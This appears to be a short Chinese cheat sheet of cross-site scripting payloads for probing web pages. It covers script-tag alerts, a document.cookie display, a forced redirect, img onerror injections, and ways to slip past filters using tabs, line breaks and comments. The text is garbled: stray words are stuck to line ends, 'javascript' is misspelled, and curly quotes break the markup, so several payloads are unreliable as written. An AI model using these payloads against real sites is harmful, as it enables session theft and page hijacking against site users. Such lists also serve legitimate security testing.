一、最多见的最经典的XSS bug检测语句必然是
<script>alert(/XSS/)</script>
<script>alert(document.cookie)</script>
<script>window.location.href="http://www.baidu.com";</script>javascript
二、利用IMG图片标记属性跨站
<img src=”javacript:alert(/XSS/)”></img>
<img src=# onerror=alert(123)>php
三、突破程序员的过滤限制html
利用javascript换行与空格突破过滤
<img src = j ava script:al er t(/XSS/)>///空格使用Tab键产生
<img src = j
ava script :a ler t(/xss/)>
利用注释<img src = “#”/**/onerror = alert(/XSS/)>java